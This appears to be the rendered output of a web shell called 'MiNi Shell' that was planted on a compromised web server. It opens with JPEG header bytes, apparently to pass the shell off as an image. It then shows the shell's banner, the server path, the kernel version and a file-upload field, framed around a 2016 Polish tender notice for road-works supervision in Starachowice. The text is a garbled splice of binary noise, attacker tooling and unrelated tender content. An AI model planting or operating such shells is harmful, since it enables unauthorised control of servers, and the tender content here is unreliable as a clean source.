JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/93024-N-2016.html

<p class="kh_header"><b>Starachowice: Pełnienie funkcji inspektora nadzoru przy realizacji zadania pn: Przebudowa drogi powiatowej nr 0565T Tychów Nowy - Ostrożanka.</b><br>
<b>Numer ogłoszenia: 93024 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Starachowicach , ul. Ostrowiecka 15, 27-200 Starachowice, woj. świętokrzyskie, tel. (041) 273 19 72-73, faks (041) 273 19 74.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru przy realizacji zadania pn: Przebudowa drogi powiatowej nr 0565T Tychów Nowy - Ostrożanka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienia obejmuje przebudowę drogi  na długości  3367 mb.

        Zakres robót budowlanych:
        - wykonanie robót rozbiórkowych , 
        - wykonanie odwodnienia : korekta rowów, przebudowa  przepustów oraz wykonanie rowu 
           krytego,
        - przebudowa wodociągu kolidującego z drogą
        - zabezpieczenie urządzeń podziemnych
        - wykonanie warstw konstrukcyjnych podbudowy i nawierzchni jezdni
        - wykonanie nawierzchni z kostki na podsypce cementowo-piaskowej z wykonaniem 
           obniżonego ścieku z kostki betonowej 
        - wykonanie robót wykończeniowych wraz z oznakowaniem


Obowiązki Inspektora nadzoru.

1. Wykonawca pełniąc czynności Inspektora Nadzoru  będzie działać w imieniu i na rzecz 
     Zamawiającego  zgodnie z obowiązującymi przepisami Prawa  Budowlanego, Ustawy 
     Prawo Zamówień Publicznych, warunkami określonymi w umowie z Wykonawcą robót.
     Inspektor nadzoru  nie ma upoważnienia do zwolnienia wykonawcy robót  z 
     jakichkolwiek jego zobowiązań wynikających z umowy o roboty budowlane. Nie może 
     także powierzyć wykonywania robót innym wykonawcom.      
2.Sprawowanie nadzoru inwestorskiego  na realizacją robót :
    2.1.  udział w  przekazaniu terenu budowy
    2.2. reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej 
            realizacji z projektem, przepisami i obowiązującymi normami oraz zasadami 
            wiedzy   technicznej,
    2.3.sprawdzanie zgodności robót z dokumentacją projektową - projektami wykonawczymi, 
          specyfikacjami technicznymi, przepisami techniczno - budowlanymi, normami 
          i przepisami  BHP.
    2.4. bieżąca kontrola zgodności  wykonywanych prac z harmonogramem robót
    2.5. podejmowanie decyzji o dopuszczeniu do stosowania (lub odrzuceniu) receptur, 
            materiałów, prefabrykatów, w tym mieszanek mineralno - bitumicznych, betonów 
            do wszystkich elementów, sprzętu i urządzeń przewidzianych do realizacji robót w 
            oparciu o przepisy normy i wymagania sformułowane w umowie z Wykonawcą, w   
            dokumentacji projektowej i Specyfikacjach Technicznych;
    2.6. zatwierdzanie materiałów, technologii budowlanych oraz jakości wykonania zgodnie 
           z warunkami kontraktów i dokumentacją projektową, SST dla wszystkich 
           asortymentów robót
    2.7. sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych, 
            a w szczególności zapobieganie zastosowania wyrobów budowlanych wadliwych i nie 
            dopuszczonych  do obrotu i stosowania w budownictwie, kontrola i archiwizacja 
            dokumentów potwierdzających dopuszczenie  tych materiałów do obrotu. 
    2.8.  sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub znikających.
    2.9. potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także, na żądanie 
            inwestora kontrolowanie rozliczeń budowy,
    2.10. wydawanie kierownikowi budowy poleceń potwierdzonych wpisem do dziennika 
             budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób 
             lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz 
            przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów 
            dopuszczenia do  obrotu i stosowania w budownictwie wyrobów  budowlanych oraz 
            urządzeń technicznych,
   2.11. żądanie od kierownika budowy lub kierownika robót dokonania poprawek bądź 
              ponownego wykonania wadliwie wykonanych robót.
   2.12.  kontrolowanie  ilości i  terminowości wykonywania robót:
              a. kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w 
                  nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny
                   właściwego wykonania robót,
              b.  uczestniczenie w dokonywaniu  odbioru częściowego  inwestycji,
              c. przygotowanie  zadania inwestycyjnego  do odbioru końcowego - sprawdzenie 
                   i zatwierdzenie dokumentacji powykonawczej (operatu kolaudacyjnego), w tym
                   powykonawczej dokumentacji geodezyjnej,
              d.  sprawdzanie faktur wykonawcy oraz dokumentów załączonych do rozliczenia 
                   robót (inwestycji),   
    2.13. uczestniczenie przy przeprowadzaniu wszelkich badań jakości, pobieraniu próbek, 
              pomiarów i sprawdzeń (wykonywanych przez Wykonawcę robót budowlanych jak
               i przez Zamawiającego) oraz interpretacja i ocena wyników badań. 
   2.14. składanie comiesięcznych raportów wraz z dokumentacja fotograficzną  o stanie
             zaawansowania inwestycji oraz występujących trudnościach w realizacji budowy
             i odstępstwach od umowy zawartej przez Zleceniodawcę z Wykonawcą, w terminie 
             do 7 -go dnia miesiąca za miesiąc  poprzedni,
 3. Przedstawianie Zamawiającemu informacji o wszelkich problemach i zagrożeniach  w trakcie 
     prowadzenia prac budowlanych 
 4. Inspektor nadzoru będzie zobowiązany do realizacji wszystkich innych czynności i zarządzeń 
     określonych przez Zamawiającego , które będą niezbędne do poprawnej  realizacji zadania 
     inwestycyjnego  i zabezpieczenia interesów Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.01.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przetargu nie jest wymagane wniesienie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od szczegółowego opisu warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia  o spełnianiu warunków w postępowaniu, o których mowa  w ar. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od szczegółowego opisu warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia  o spełnianiu warunków w postępowaniu, o których mowa  w ar. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże osoby, które będą uczestniczyć w wykonaniu  zamówienia  
        legitymujące się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem 
        odpowiednimi do funkcji jakie zostaną im powierzone:

                    Osoba wskazana na stanowisko Inspektor Nadzoru  - 1 osoba musi 
                      posiadać uprawnienia  budowlane wymagane przepisami prawa do pełnienia 
                      samodzielnej funkcji technicznej w budownictwie  w zakresie kierowania 
                      robotami  budowlanymi, specjalność drogowa lub  odpowiadające im ważne
                      uprawnienia  budowlane wydane na podstawie  wcześniej  obowiązujących  
                        przepisów. (podstawa prawna Ustawa  z dnia  7 lipca 1994 r. Prawo budowlane 
                      (tekst jednolity Dz. U. z 2010 r. nr 243 poz. 1623 ze zm.).

Wykonawca może wykazać na stanowisko inspektora nadzoru  osobę będącą     obywatelem państwa członkowskiego, której odpowiednie kwalifikacje zawodowe  zostały uznane na zasadach określonych w przepisach odrębnych (m.in. w ustawie z dnia 22.12.2015r.  Dz. U. z 2016r poz.65 o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej).

Zamawiający dokona oceny spełnienia niniejszego warunku na postawie informacji zawartych w złożonych dokumentach- spełnia /nie spełnia.
Warunek zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował ww. osobami na czas realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od szczegółowego opisu warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia  o spełnianiu warunków w postępowaniu, o których mowa  w ar. 22 ust.1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Umowę  można  zmienić,  jeżeli  wystąpią  istotne  okoliczności,  których nie można było    
           przewidzieć w chwili zawarcia umowy:
                 a. Zamawiający dopuszcza możliwość przedłużenia terminu realizacji wykonania 
                      zamówienia w przypadku przedłużenia terminu realizacji umowy z Wykonawcą
                      robót  budowlanych w przypadku wystąpienia niezależnych od Wykonawcy robót 
                      budowlanych  okoliczności.
                 b. Zmiana osoby na  stanowisku Inspektora Nadzoru( pod warunkiem, że wskazana 
                      osoba spełniać  będzie wymagania  określone w specyfikacji  istotnych warunków  
                      zamówienia,  
                 c. Przedłużenie terminu zakończenia realizacji umowy  w przypadku opóźnienia 
                      wykonania  robót budowlanych z winy Wykonawcy robót budowlanych.
                 d.  Zmian teleadresowych  Stron umowy określonych w umowie;
                 e.  Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy;
                 f.   Zmiana osoby odpowiedzialnej za realizację zamówienia ze strony Zamawiającego.
   2. W przypadku nie wskazania w ofercie części zamówienia przewidzianej do 
                    powierzenia podwykonawcy 	lub zmiany części przewidzianej do powierzenia 
                    podwykonawcy  Zamawiający dopuszcza zmianę w tym zakresie pod warunkiem 
                    uzyskania zgody Zamawiającego wyrażonej poprzez akceptację umowy
                    o podwykonawstwo.
3.    zmiana Podwykonawcy, a w przypadku  jeżeli zmiana dotyczy podmiotu trzeciego, 
           na  zasobach którego Wykonawca opierał  się  wykazując spełnianie warunków 
           udziału  w postępowaniu, Zamawiający dopuści  zmianę  Podwykonawcy pod 
           warunkiem, że nowy Podwykonawca wykaże spełnianie warunków w  zakresie nie 
           mniejszym niż  wskazane na etapie postępowania o udzielenie zamówienia  
           publicznego przez dotychczasowego Podwykonawcę;
   4.      Zmiana wysokość wynagrodzenia  należnego wykonawcy: 
                 a) w przypadku urzędowej zmiany podatku od towarów i usług VAT wynagrodzenie 
                     pozostałe do zafakturowania zostanie odpowiednio przeszacowane i stanowić 
                     będzie podstawę do  zawarcia  stosownego aneksu - każda ze stron jest 
                     zobowiązana do zatwierdzenia zmian  umowy w razie  zaistnienia takiej sytuacji;
                 b) w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę 
                      ustalonego na  podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. 
                      o minimalnym wynagrodzeniu za  pracę;
                  c) w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub 
                       ubezpieczeniu  zdrowotnemu lub wysokości stawki składki na ubezpieczenia 
                        społeczne lub zdrowotne.
                         - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez 
                           Wykonawcę.
  Wykonawca zobowiązany jest w przypadku zajścia okoliczności wskazanych 
                     w  pkt. 4  ppkt.   a),  b)  i c) do wykazania i udokumentowania okoliczności 
                     potwierdzających, że wskazane zmiany miały   wpływ na koszty wykonania 
                     zamówienia. W związku z tym Zamawiający ma również  prawo   żądać od 
                     Wykonawcy przedstawienia dokumentów źródłowych  stanowiących dowody  
                     zmian  kosztów wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdp-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych 
Ul. Ostrowiecka 15
27-200 Starachowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2016 godzina 11:00, miejsce: Zarząd Dróg Powiatowych 
Ul. Ostrowiecka 15
27-200 Starachowice, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane za środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020. Operacja typu Budowa lub modernizacja dróg lokalnych w ramach poddziałania Wsparcie inwestycji związanych z tworzeniem, ulepszeniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii w ramach działania Podstawowe usługi i odnowa wsi na obszarach wiejskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com